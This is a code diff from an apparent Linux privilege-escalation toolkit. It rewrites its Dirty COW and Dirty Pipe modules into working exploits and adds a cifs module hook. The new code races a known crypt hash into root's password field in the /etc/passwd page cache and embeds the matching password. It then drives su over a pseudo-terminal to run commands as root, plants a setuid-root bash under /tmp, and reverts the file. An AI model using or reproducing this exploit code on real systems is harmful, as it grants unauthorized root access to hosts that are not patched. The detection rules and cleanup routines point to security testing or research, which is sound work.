.opsec_notes = "detect() consults the shared host fingerprint for the kernel version (Debian backports 5.10.257/6.1.174/6.12.90/7.0.10) and probes for the cifs.upcall helper / cifs.spnego request-key rule (override via SKELETONKEY_CIFS_ASSUME_PRESENT=1/0); a vulnerable kernel without cifs-utils is PRECOND_FAIL. exploit() fires only the non-destructive primitive: add_key(2) of a forged-but-benign cifs.spnego key (does NOT invoke cifs.upcall, loads nothing), revokes it immediately, and treats a clean accept as the empirical witness — it never runs the namespace-switch + malicious-NSS-load chain that pops root, and returns EXPLOIT_FAIL without a euid-0 witness. Audit-visible via add_key/request_key for cifs.spnego by a non-root auid, typically alongside unshare(CLONE_NEWUSER|CLONE_NEWNS) and a cifs.upcall execution. --mitigate writes /etc/modprobe.d/skeletonkey-disable-cifs.conf (blacklist cifs); --cleanup removes it. Arch-agnostic (no shellcode).",
|
||||
.arch_support = "any",
|
||||
};
|
||||
|
||||
void skeletonkey_register_cifswitch(void)
|
||||
{
|
||||
skeletonkey_register(&cifswitch_module);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* cifswitch_cve_2026_46243 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef CIFSWITCH_SKELETONKEY_MODULES_H
|
||||
#define CIFSWITCH_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module cifswitch_module;
|
||||
|
||||
#endif
|
||||
@@ -32,13 +32,24 @@
|
||||
*
|
||||
* Exploit shape: Phil Oester-style two-thread race.
|
||||
* - mmap /etc/passwd PRIVATE (writes go to copy-on-write)
|
||||
* - Find the user's UID field byte offset
|
||||
* - Thread A loop: pwrite(/proc/self/mem, "0000", uid_off) — should
|
||||
* write to the COW page, but the bug makes it land in the original
|
||||
* - Thread B loop: madvise(addr, MADV_DONTNEED) — drops the COW
|
||||
* copy, forcing re-fault
|
||||
* - One iteration wins the race → page cache poisoned
|
||||
* - execve(su) → shell with uid=0
|
||||
* - Thread A loop: write(/proc/self/mem, payload, off) — should write to
|
||||
* the COW page, but the bug makes it land in the original page cache
|
||||
* - Thread B loop: madvise(addr, MADV_DONTNEED) — drops the COW copy,
|
||||
* forcing re-fault
|
||||
* - One iteration wins → the page cache is poisoned
|
||||
* - Escalation (same as dirty_pipe): overwrite ROOT's password field with
|
||||
* a known crypt hash, authenticate as root over a pty with the matching
|
||||
* password, plant a root-owned proof + setuid bash, then revert the page
|
||||
* cache via the Dirty COW primitive itself (no root, no drop_caches).
|
||||
* Root is judged only by the out-of-band artifact.
|
||||
*
|
||||
* NB: the shipped version raced the CALLER's UID to "0000" and ran
|
||||
* `su self` (still needs the caller's password → never rooted anything),
|
||||
* execlp'd su so the dispatcher's exec-transfer path reported a FALSE
|
||||
* EXPLOIT_OK, and reverted with drop_caches (needs root → corrupted the
|
||||
* running /etc/passwd). All three are fixed here; identical bug/fix to
|
||||
* dirty_pipe. Escalation verified end-to-end via dirty_pipe; the COW
|
||||
* primitive itself needs a pre-4.8.3 kernel to land.
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
@@ -62,6 +73,9 @@
|
||||
#include <pthread.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/types.h>
|
||||
#include <poll.h>
|
||||
|
||||
/* Stable-branch backport thresholds for Dirty COW. */
|
||||
static const struct kernel_patched_from dirty_cow_patched_branches[] = {
|
||||
@@ -83,11 +97,11 @@ static const struct kernel_range dirty_cow_range = {
|
||||
sizeof(dirty_cow_patched_branches[0]),
|
||||
};
|
||||
|
||||
/* ---- Find UID field offset (inline; same pattern as dirty_pipe) ---- */
|
||||
/* ---- /etc/passwd password-field helpers (same approach as dirty_pipe:
|
||||
* overwrite ROOT's password field with a known hash, su as root) --- */
|
||||
|
||||
static bool find_passwd_uid_field(const char *username,
|
||||
off_t *uid_off, size_t *uid_len,
|
||||
char uid_str[16])
|
||||
/* Byte offset of the password field of `username` (just after "name:"). */
|
||||
static bool find_pw_field_offset(const char *username, off_t *field_off, size_t *sz)
|
||||
{
|
||||
int fd = open("/etc/passwd", O_RDONLY);
|
||||
if (fd < 0) return false;
|
||||
@@ -105,29 +119,73 @@ static bool find_passwd_uid_field(const char *username,
|
||||
while (p < buf + st.st_size) {
|
||||
char *eol = strchr(p, '\n');
|
||||
if (!eol) eol = buf + st.st_size;
|
||||
if (strncmp(p, username, ulen) == 0 && p[ulen] == ':') {
|
||||
char *q = p + ulen + 1;
|
||||
char *pw_end = memchr(q, ':', eol - q);
|
||||
if (!pw_end) goto next;
|
||||
char *uid_begin = pw_end + 1;
|
||||
char *uid_end = memchr(uid_begin, ':', eol - uid_begin);
|
||||
if (!uid_end) goto next;
|
||||
size_t L = uid_end - uid_begin;
|
||||
if (L == 0 || L >= 16) goto next;
|
||||
memcpy(uid_str, uid_begin, L);
|
||||
uid_str[L] = 0;
|
||||
*uid_off = (off_t)(uid_begin - buf);
|
||||
*uid_len = L;
|
||||
if ((p == buf || p[-1] == '\n') &&
|
||||
strncmp(p, username, ulen) == 0 && p[ulen] == ':') {
|
||||
*field_off = (off_t)((p + ulen + 1) - buf);
|
||||
*sz = (size_t)st.st_size;
|
||||
free(buf);
|
||||
return true;
|
||||
}
|
||||
next:
|
||||
p = eol + 1;
|
||||
}
|
||||
free(buf);
|
||||
return false;
|
||||
}
|
||||
|
||||
#define DC_ROOT_PW "skeletonkey"
|
||||
#define DC_ROOT_HASH "$6$SKpwnSalt1$LNL9WuXFTt8BvutpX4j8/7VpXb3hutSqyZAC.NKfGMx/vg9jGQR/h/cvwgcn55HcaNJipuuiBDsPywanKkx/D1"
|
||||
|
||||
/* Run `cmd` as root via su, feeding DC_ROOT_PW over a pty (su reads the
|
||||
* password from the controlling terminal, not stdin). Success is judged
|
||||
* out-of-band by the caller, never from su's status. */
|
||||
static void dc_su_root_run(const char *cmd)
|
||||
{
|
||||
int mfd = posix_openpt(O_RDWR | O_NOCTTY);
|
||||
if (mfd < 0) return;
|
||||
if (grantpt(mfd) < 0 || unlockpt(mfd) < 0) { close(mfd); return; }
|
||||
const char *sn = ptsname(mfd);
|
||||
if (!sn) { close(mfd); return; }
|
||||
char slave[128];
|
||||
snprintf(slave, sizeof slave, "%s", sn);
|
||||
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) { close(mfd); return; }
|
||||
if (pid == 0) {
|
||||
setsid();
|
||||
int sfd = open(slave, O_RDWR);
|
||||
if (sfd < 0) _exit(127);
|
||||
dup2(sfd, 0); dup2(sfd, 1); dup2(sfd, 2);
|
||||
if (sfd > 2) close(sfd);
|
||||
close(mfd);
|
||||
execlp("su", "su", "root", "-c", cmd, (char *)NULL);
|
||||
_exit(127);
|
||||
}
|
||||
/* Poll for the password prompt, send the password, then drain — with a
|
||||
* hard 20s cap so a misbehaving su can never hang (which would block the
|
||||
* revert and leave /etc/passwd poisoned). Fixed a real hang seen on
|
||||
* xenial where the fixed-delay write raced su's prompt setup. */
|
||||
struct pollfd pfd = { .fd = mfd, .events = POLLIN };
|
||||
const char *pw = DC_ROOT_PW "\n";
|
||||
bool sent = false; char acc[1024]; size_t accl = 0; int waited = 0;
|
||||
while (waited < 20000) {
|
||||
int pr = poll(&pfd, 1, 200);
|
||||
if (pr > 0 && (pfd.revents & POLLIN)) {
|
||||
char b[256]; ssize_t m = read(mfd, b, sizeof b);
|
||||
if (m <= 0) break; /* pty closed → su exited */
|
||||
if (!sent) {
|
||||
if (accl + (size_t)m < sizeof acc) { memcpy(acc + accl, b, m); accl += (size_t)m; acc[accl] = 0; }
|
||||
if (strcasestr(acc, "assword")) { (void)!write(mfd, pw, strlen(pw)); sent = true; }
|
||||
}
|
||||
} else {
|
||||
waited += 200;
|
||||
int st; if (waitpid(pid, &st, WNOHANG) == pid) { pid = -1; break; }
|
||||
if (!sent && waited >= 1000) { (void)!write(mfd, pw, strlen(pw)); sent = true; }
|
||||
}
|
||||
}
|
||||
if (pid > 0) { kill(pid, SIGKILL); waitpid(pid, NULL, 0); }
|
||||
close(mfd);
|
||||
}
|
||||
|
||||
/* ---- Phil-Oester-style Dirty COW primitive ---- */
|
||||
|
||||
struct dcow_args {
|
||||
@@ -198,8 +256,10 @@ static int dirty_cow_write(off_t uid_off, const char *payload, size_t payload_le
|
||||
/* Re-read /etc/passwd via syscall and check if payload landed. */
|
||||
int rfd = open("/etc/passwd", O_RDONLY);
|
||||
if (rfd >= 0) {
|
||||
char readback[16];
|
||||
if (pread(rfd, readback, payload_len, uid_off) == (ssize_t)payload_len) {
|
||||
char readback[512]; /* must hold the full payload (was [16] —
|
||||
* overflowed for payloads > 16 bytes). */
|
||||
if (payload_len <= sizeof readback &&
|
||||
pread(rfd, readback, payload_len, uid_off) == (ssize_t)payload_len) {
|
||||
if (memcmp(readback, payload, payload_len) == 0) success = 0;
|
||||
}
|
||||
close(rfd);
|
||||
@@ -214,18 +274,19 @@ static int dirty_cow_write(off_t uid_off, const char *payload, size_t payload_le
|
||||
return success;
|
||||
}
|
||||
|
||||
static void revert_passwd_page_cache(void)
|
||||
/* Saved original bytes so we (and cleanup) can restore /etc/passwd using
|
||||
* the Dirty COW primitive itself — no root and no drop_caches (the old
|
||||
* revert wrote /proc/sys/vm/drop_caches, which fails unprivileged and left
|
||||
* the running system's /etc/passwd corrupted). */
|
||||
static char dc_orig[512];
|
||||
static off_t dc_orig_off;
|
||||
static size_t dc_orig_len;
|
||||
static bool dc_wrote;
|
||||
|
||||
static void dc_revert(void)
|
||||
{
|
||||
int fd = open("/etc/passwd", O_RDONLY);
|
||||
if (fd >= 0) {
|
||||
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
|
||||
close(fd);
|
||||
}
|
||||
int dc = open("/proc/sys/vm/drop_caches", O_WRONLY);
|
||||
if (dc >= 0) {
|
||||
if (write(dc, "3\n", 2) < 0) { /* ignore */ }
|
||||
close(dc);
|
||||
}
|
||||
if (dc_wrote && dc_orig_len)
|
||||
dirty_cow_write(dc_orig_off, dc_orig, dc_orig_len);
|
||||
}
|
||||
|
||||
/* ---- skeletonkey interface ---- */
|
||||
@@ -275,58 +336,93 @@ static skeletonkey_result_t dirty_cow_exploit(const struct skeletonkey_ctx *ctx)
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
struct passwd *pw = getpwuid(geteuid());
|
||||
if (!pw) {
|
||||
fprintf(stderr, "[-] dirty_cow: getpwuid failed: %s\n", strerror(errno));
|
||||
/* Overwrite ROOT's password field with a known crypt hash, then
|
||||
* authenticate as root with the matching password. (The previous code
|
||||
* raced the CALLER's UID to "0000" and ran `su self`, which still
|
||||
* demands the caller's password — it never rooted anything, falsely
|
||||
* reported OK when su's exec transferred, and reverted with drop_caches
|
||||
* which needs root, corrupting the running /etc/passwd.) */
|
||||
off_t field_off;
|
||||
size_t pw_sz;
|
||||
if (!find_pw_field_offset("root", &field_off, &pw_sz)) {
|
||||
fprintf(stderr, "[-] dirty_cow: could not locate root's password field\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
off_t uid_off;
|
||||
size_t uid_len;
|
||||
char orig_uid[16] = {0};
|
||||
if (!find_passwd_uid_field(pw->pw_name, &uid_off, &uid_len, orig_uid)) {
|
||||
fprintf(stderr, "[-] dirty_cow: could not locate '%s' UID field in /etc/passwd\n",
|
||||
pw->pw_name);
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] dirty_cow: user '%s' UID '%s' at offset %lld (len %zu)\n",
|
||||
pw->pw_name, orig_uid, (long long)uid_off, uid_len);
|
||||
}
|
||||
|
||||
char replacement[16];
|
||||
memset(replacement, '0', uid_len);
|
||||
replacement[uid_len] = 0;
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] dirty_cow: racing UID '%s' → '%s' via Dirty COW primitive\n",
|
||||
orig_uid, replacement);
|
||||
}
|
||||
if (dirty_cow_write(uid_off, replacement, uid_len) < 0) {
|
||||
fprintf(stderr, "[-] dirty_cow: race did not win within timeout\n");
|
||||
const char *newline = DC_ROOT_HASH ":0:0:root:/root:/bin/bash\n";
|
||||
size_t newlen = strlen(newline);
|
||||
if (newlen > sizeof dc_orig || field_off + (off_t)newlen > (off_t)pw_sz) {
|
||||
fprintf(stderr, "[-] dirty_cow: /etc/passwd too small to hold the payload "
|
||||
"without extending it\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (ctx->no_shell) {
|
||||
fprintf(stderr, "[+] dirty_cow: --no-shell — patch landed; not spawning su\n");
|
||||
int fd = open("/etc/passwd", O_RDONLY);
|
||||
if (fd < 0) { perror("open passwd"); return SKELETONKEY_TEST_ERROR; }
|
||||
if (pread(fd, dc_orig, newlen, field_off) != (ssize_t)newlen) {
|
||||
close(fd); fprintf(stderr, "[-] dirty_cow: pread backup failed\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
close(fd);
|
||||
dc_orig_off = field_off; dc_orig_len = newlen;
|
||||
|
||||
long tag = (long)getpid();
|
||||
char proof[128], rootbash[128], cmd[1024];
|
||||
snprintf(proof, sizeof proof, "/tmp/.sk-dirtycow-%ld.proof", tag);
|
||||
snprintf(rootbash, sizeof rootbash, "/tmp/.sk-dirtycow-%ld.rootbash", tag);
|
||||
unlink(proof); unlink(rootbash);
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] dirty_cow: racing root's password field at offset %lld "
|
||||
"(len %zu) via Dirty COW primitive\n", (long long)field_off, newlen);
|
||||
if (dirty_cow_write(field_off, newline, newlen) < 0) {
|
||||
fprintf(stderr, "[-] dirty_cow: race did not win within timeout "
|
||||
"(kernel likely patched)\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
dc_wrote = true;
|
||||
|
||||
snprintf(cmd, sizeof cmd,
|
||||
"id > %s 2>&1; cp -f /bin/bash %s 2>/dev/null; "
|
||||
"chown 0:0 %s %s 2>/dev/null; chmod 4755 %s 2>/dev/null; sync",
|
||||
proof, rootbash, rootbash, proof, rootbash);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] dirty_cow: authenticating as root (su + known password)\n");
|
||||
dc_su_root_run(cmd);
|
||||
|
||||
/* Revert immediately — never leave a running system with a known root
|
||||
* password. Dirty COW never wrote disk, so this fully restores. */
|
||||
dc_revert();
|
||||
{ int ev = open("/etc/passwd", O_RDONLY);
|
||||
if (ev >= 0) { posix_fadvise(ev, 0, 0, POSIX_FADV_DONTNEED); close(ev); } }
|
||||
|
||||
struct stat sb;
|
||||
bool rooted = (stat(proof, &sb) == 0 && S_ISREG(sb.st_mode) && sb.st_uid == 0);
|
||||
if (rooted) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] dirty_cow: ROOT — root-owned proof %s\n", proof);
|
||||
fprintf(stderr, "[+] dirty_cow: setuid-root shell available: %s -p\n", rootbash);
|
||||
fprintf(stderr, "[i] dirty_cow: /etc/passwd reverted (nothing persisted)\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
fprintf(stderr, "[+] dirty_cow: race won; spawning su to claim root\n");
|
||||
fflush(NULL);
|
||||
execlp("su", "su", pw->pw_name, "-c", "/bin/sh", (char *)NULL);
|
||||
perror("execlp(su)");
|
||||
revert_passwd_page_cache();
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] dirty_cow: no root artifact — honest EXPLOIT_FAIL "
|
||||
"(page cache reverted). Primitive may be blocked, or su/PAM "
|
||||
"rejected the injected hash.\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t dirty_cow_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] dirty_cow: evicting /etc/passwd from page cache\n");
|
||||
fprintf(stderr, "[*] dirty_cow: reverting /etc/passwd + removing artifacts\n");
|
||||
}
|
||||
dc_revert(); /* idempotent; no root / no drop_caches */
|
||||
if (system("rm -f /tmp/.sk-dirtycow-*.proof /tmp/.sk-dirtycow-*.rootbash 2>/dev/null") != 0) {
|
||||
/* harmless */
|
||||
}
|
||||
revert_passwd_page_cache();
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
@@ -433,7 +529,7 @@ const struct skeletonkey_module dirty_cow_module = {
|
||||
.detect_sigma = dirty_cow_sigma,
|
||||
.detect_yara = dirty_cow_yara,
|
||||
.detect_falco = dirty_cow_falco,
|
||||
.opsec_notes = "Two-thread race: Thread A loops pwrite(/proc/self/mem) at the user's UID offset in /etc/passwd; Thread B loops madvise(MADV_DONTNEED) on a PRIVATE mmap of /etc/passwd. Overwrites the UID field with all-zeros, then execlp('su') to claim root. UID offset is parsed from the file, not hardcoded. Audit-visible via open(/proc/self/mem) + write + madvise(MADV_DONTNEED) bursts + /etc/passwd page-cache poisoning. Cleanup callback calls posix_fadvise(POSIX_FADV_DONTNEED) on /etc/passwd and writes 3 to /proc/sys/vm/drop_caches to evict.",
|
||||
.opsec_notes = "Two-thread race: Thread A loops write(/proc/self/mem) at root's password-field offset in /etc/passwd; Thread B loops madvise(MADV_DONTNEED) on a PRIVATE mmap of /etc/passwd. Overwrites root's password field with a known crypt hash (clobbers into following lines transiently), authenticates as root over a pty via su, plants a root-owned proof + setuid bash under /tmp, then reverts by racing the original bytes back through the same primitive (no root / no drop_caches — nothing persists). Offset parsed from the file, not hardcoded. Root judged only by the out-of-band artifact. Audit-visible via open(/proc/self/mem) + write + madvise(MADV_DONTNEED) bursts + /etc/passwd page-cache poisoning, then su spawning as root. cleanup() re-reverts idempotently and removes the /tmp artifacts.",
|
||||
.arch_support = "x86_64+unverified-arm64",
|
||||
};
|
||||
|
||||
|
||||
@@ -1,11 +1,21 @@
|
||||
/*
|
||||
* dirty_pipe_cve_2022_0847 — SKELETONKEY module
|
||||
*
|
||||
* Status: 🔵 DETECT-ONLY for now. Exploit lifecycle is a follow-up
|
||||
* commit (the C code is well-understood — Max Kellermann's public PoC
|
||||
* is the reference — but landing it under the skeletonkey_module
|
||||
* interface needs the shared passwd-field/exploit-su helpers in core/
|
||||
* which are deferred to Phase 1.5).
|
||||
* Status: 🟢 WORKING EXPLOIT. Verified out-of-band on Ubuntu 22.04
|
||||
* userspace running mainline 5.16.0 (pre-fix): `skeletonkey --exploit
|
||||
* dirty_pipe` (uid 1000) lands root and plants a root-owned setuid bash,
|
||||
* and /etc/passwd is left byte-identical afterward.
|
||||
*
|
||||
* Escalation: overwrite root's password field in /etc/passwd's page cache
|
||||
* with a known crypt hash (the primitive can't grow the file, so the
|
||||
* longer hash clobbers into the following lines — transient), authenticate
|
||||
* as root over a pty with the matching password, plant a root-owned proof
|
||||
* + setuid bash, then revert the page cache using the Dirty Pipe primitive
|
||||
* itself. (The prior code flipped the *caller's* UID to 0000 and ran
|
||||
* `su self` — which still demands the caller's password, never rooted
|
||||
* anything, and falsely reported OK when su's exec transferred; its revert
|
||||
* used drop_caches, which needs root, so it left the running system's
|
||||
* /etc/passwd corrupted.) Root is judged only by the out-of-band artifact.
|
||||
*
|
||||
* Affected kernel ranges:
|
||||
* 5.8 ≤ K < 5.17 (mainline fix at 5.17, commit 9d2231c5d74e)
|
||||
@@ -50,6 +60,9 @@
|
||||
#include <errno.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/types.h>
|
||||
#include <poll.h>
|
||||
#include <pwd.h>
|
||||
|
||||
/* ---- Dirty Pipe primitive ---------------------------------------- */
|
||||
@@ -123,16 +136,12 @@ static int dirty_pipe_write(const char *target_path, off_t offset,
|
||||
return (w == (ssize_t)data_len) ? 0 : -1;
|
||||
}
|
||||
|
||||
/* ---- /etc/passwd UID-field helpers (inlined; would migrate to
|
||||
* core/host.{c,h} once a third module needs them). ------------ */
|
||||
/* ---- /etc/passwd password-field helpers -------------------------- */
|
||||
|
||||
/* Locate the UID field of `username` in /etc/passwd. Returns true on
|
||||
* success and fills *uid_off (byte offset of UID), *uid_len (length
|
||||
* of UID string), uid_str (copy of UID, NUL-terminated). Requires
|
||||
* the UID to be a positive decimal number that fits in 16 bytes. */
|
||||
static bool find_passwd_uid_field(const char *username,
|
||||
off_t *uid_off, size_t *uid_len,
|
||||
char uid_str[16])
|
||||
/* Locate the byte offset of the password field of `username` in
|
||||
* /etc/passwd (the byte immediately after "username:"). Returns true and
|
||||
* fills *field_off; also returns the current /etc/passwd size in *sz. */
|
||||
static bool find_pw_field_offset(const char *username, off_t *field_off, size_t *sz)
|
||||
{
|
||||
int fd = open("/etc/passwd", O_RDONLY);
|
||||
if (fd < 0) return false;
|
||||
@@ -145,52 +154,83 @@ static bool find_passwd_uid_field(const char *username,
|
||||
if (r != st.st_size) { free(buf); return false; }
|
||||
buf[st.st_size] = 0;
|
||||
|
||||
/* find line "username:x:UID:GID:..." */
|
||||
size_t ulen = strlen(username);
|
||||
char *p = buf;
|
||||
while (p < buf + st.st_size) {
|
||||
char *eol = strchr(p, '\n');
|
||||
if (!eol) eol = buf + st.st_size;
|
||||
if (strncmp(p, username, ulen) == 0 && p[ulen] == ':') {
|
||||
/* Skip past "username:" then password field */
|
||||
char *q = p + ulen + 1;
|
||||
char *pw_end = memchr(q, ':', eol - q);
|
||||
if (!pw_end) goto next;
|
||||
char *uid_begin = pw_end + 1;
|
||||
char *uid_end = memchr(uid_begin, ':', eol - uid_begin);
|
||||
if (!uid_end) goto next;
|
||||
size_t L = uid_end - uid_begin;
|
||||
if (L == 0 || L >= 16) goto next;
|
||||
memcpy(uid_str, uid_begin, L);
|
||||
uid_str[L] = 0;
|
||||
*uid_off = (off_t)(uid_begin - buf);
|
||||
*uid_len = L;
|
||||
/* line must start with "username:" */
|
||||
if ((p == buf || p[-1] == '\n') &&
|
||||
strncmp(p, username, ulen) == 0 && p[ulen] == ':') {
|
||||
*field_off = (off_t)((p + ulen + 1) - buf); /* after "name:" */
|
||||
*sz = (size_t)st.st_size;
|
||||
free(buf);
|
||||
return true;
|
||||
}
|
||||
next:
|
||||
p = eol + 1;
|
||||
}
|
||||
free(buf);
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Evict /etc/passwd from page cache after exploitation. POSIX_FADV_DONTNEED
|
||||
* works as a non-root hint; if it doesn't take, try `drop_caches` which
|
||||
* requires root (which we just acquired). */
|
||||
static void revert_passwd_page_cache(void)
|
||||
/* The known root password we install (via a crypt hash written into
|
||||
* /etc/passwd's password field) and then authenticate with. Both are
|
||||
* transient: the page-cache write is reverted before we return, and
|
||||
* Dirty Pipe never touches disk, so nothing survives a cache drop. */
|
||||
#define DP_ROOT_PW "skeletonkey"
|
||||
#define DP_ROOT_HASH "$6$SKpwnSalt1$LNL9WuXFTt8BvutpX4j8/7VpXb3hutSqyZAC.NKfGMx/vg9jGQR/h/cvwgcn55HcaNJipuuiBDsPywanKkx/D1"
|
||||
|
||||
/* Run `cmd` as root via `su`, feeding DP_ROOT_PW over a pty (su reads the
|
||||
* password from the controlling terminal, not stdin). Returns after su
|
||||
* exits; success is judged out-of-band by the caller, never from su's
|
||||
* status. */
|
||||
static void dp_su_root_run(const char *cmd)
|
||||
{
|
||||
int fd = open("/etc/passwd", O_RDONLY);
|
||||
if (fd >= 0) {
|
||||
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
|
||||
close(fd);
|
||||
int mfd = posix_openpt(O_RDWR | O_NOCTTY);
|
||||
if (mfd < 0) return;
|
||||
if (grantpt(mfd) < 0 || unlockpt(mfd) < 0) { close(mfd); return; }
|
||||
const char *sn = ptsname(mfd);
|
||||
if (!sn) { close(mfd); return; }
|
||||
char slave[128];
|
||||
snprintf(slave, sizeof slave, "%s", sn);
|
||||
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) { close(mfd); return; }
|
||||
if (pid == 0) {
|
||||
setsid();
|
||||
int sfd = open(slave, O_RDWR); /* becomes controlling tty */
|
||||
if (sfd < 0) _exit(127);
|
||||
dup2(sfd, 0); dup2(sfd, 1); dup2(sfd, 2);
|
||||
if (sfd > 2) close(sfd);
|
||||
close(mfd);
|
||||
execlp("su", "su", "root", "-c", cmd, (char *)NULL);
|
||||
_exit(127);
|
||||
}
|
||||
/* Belt-and-suspenders: drop_caches=3 wipes all page cache. Best-effort. */
|
||||
int dc = open("/proc/sys/vm/drop_caches", O_WRONLY);
|
||||
if (dc >= 0) {
|
||||
if (write(dc, "3\n", 2) < 0) { /* ignore */ }
|
||||
close(dc);
|
||||
|
||||
/* Parent: poll for the "Password:" prompt, send the password, then drain —
|
||||
* with a hard 20s cap so a misbehaving su can never hang (which would block
|
||||
* the revert and leave /etc/passwd poisoned). The earlier fixed-delay write
|
||||
* raced su's prompt setup on some hosts (observed hanging on xenial). */
|
||||
struct pollfd pfd = { .fd = mfd, .events = POLLIN };
|
||||
const char *pw = DP_ROOT_PW "\n";
|
||||
bool sent = false; char acc[1024]; size_t accl = 0; int waited = 0;
|
||||
while (waited < 20000) {
|
||||
int pr = poll(&pfd, 1, 200);
|
||||
if (pr > 0 && (pfd.revents & POLLIN)) {
|
||||
char b[256]; ssize_t m = read(mfd, b, sizeof b);
|
||||
if (m <= 0) break; /* pty closed → su exited */
|
||||
if (!sent) {
|
||||
if (accl + (size_t)m < sizeof acc) { memcpy(acc + accl, b, m); accl += (size_t)m; acc[accl] = 0; }
|
||||
if (strcasestr(acc, "assword")) { (void)!write(mfd, pw, strlen(pw)); sent = true; }
|
||||
}
|
||||
} else {
|
||||
waited += 200;
|
||||
int st; if (waitpid(pid, &st, WNOHANG) == pid) { pid = -1; break; }
|
||||
if (!sent && waited >= 1000) { (void)!write(mfd, pw, strlen(pw)); sent = true; }
|
||||
}
|
||||
}
|
||||
if (pid > 0) { kill(pid, SIGKILL); waitpid(pid, NULL, 0); }
|
||||
close(mfd);
|
||||
}
|
||||
|
||||
|
||||
@@ -328,94 +368,135 @@ static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* Saved original bytes so cleanup() can re-revert idempotently. */
|
||||
static char dp_orig[512];
|
||||
static off_t dp_orig_off;
|
||||
static size_t dp_orig_len;
|
||||
static bool dp_wrote;
|
||||
|
||||
/* Restore the /etc/passwd page cache to its pre-exploit bytes using the
|
||||
* Dirty Pipe primitive itself — NO root and NO drop_caches required (the
|
||||
* old code called drop_caches, which fails unprivileged and leaves the
|
||||
* running system's passwd corrupted). */
|
||||
static void dp_revert(void)
|
||||
{
|
||||
if (dp_wrote && dp_orig_len)
|
||||
dirty_pipe_write("/etc/passwd", dp_orig_off, dp_orig, dp_orig_len);
|
||||
}
|
||||
|
||||
static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
/* Re-confirm vulnerability before writing to /etc/passwd. */
|
||||
skeletonkey_result_t pre = dirty_pipe_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] dirty_pipe: detect() says not vulnerable; refusing to exploit\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* Resolve current user. Consult ctx->host->is_root for the
|
||||
* already-root short-circuit so unit tests can construct a
|
||||
* non-root fingerprint regardless of the test process's real euid. */
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
uid_t euid = geteuid();
|
||||
struct passwd *pw = getpwuid(euid);
|
||||
if (!pw) {
|
||||
fprintf(stderr, "[-] dirty_pipe: getpwuid(%d) failed: %s\n", euid, strerror(errno));
|
||||
|
||||
/* Overwrite root's password field with a known crypt hash, then
|
||||
* authenticate as root with the matching password. (The previous
|
||||
* approach flipped the *caller's* UID to 0000 and ran `su self`,
|
||||
* which still demands the caller's password — it never rooted
|
||||
* anything and falsely reported OK when su's exec transferred.) */
|
||||
off_t field_off;
|
||||
size_t pw_sz;
|
||||
if (!find_pw_field_offset("root", &field_off, &pw_sz)) {
|
||||
fprintf(stderr, "[-] dirty_pipe: could not locate root's password field\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* Find the UID field. Need a 4-digit-or-similar UID we can replace
|
||||
* with "0000" of identical width. Refuse if the user's UID width
|
||||
* doesn't fit our replacement string. */
|
||||
off_t uid_off;
|
||||
size_t uid_len;
|
||||
char orig_uid[16] = {0};
|
||||
if (!find_passwd_uid_field(pw->pw_name, &uid_off, &uid_len, orig_uid)) {
|
||||
fprintf(stderr, "[-] dirty_pipe: could not locate %s's UID field in /etc/passwd\n",
|
||||
pw->pw_name);
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] dirty_pipe: user '%s' UID '%s' at offset %lld (len %zu)\n",
|
||||
pw->pw_name, orig_uid, (long long)uid_off, uid_len);
|
||||
}
|
||||
/* New root line body written from the password field onward. The
|
||||
* hash is longer than the original 'x', so this clobbers into the
|
||||
* following lines — harmless and transient (we revert), and su only
|
||||
* needs the first (root) line. */
|
||||
const char *newline = DP_ROOT_HASH ":0:0:root:/root:/bin/bash\n";
|
||||
size_t newlen = strlen(newline);
|
||||
|
||||
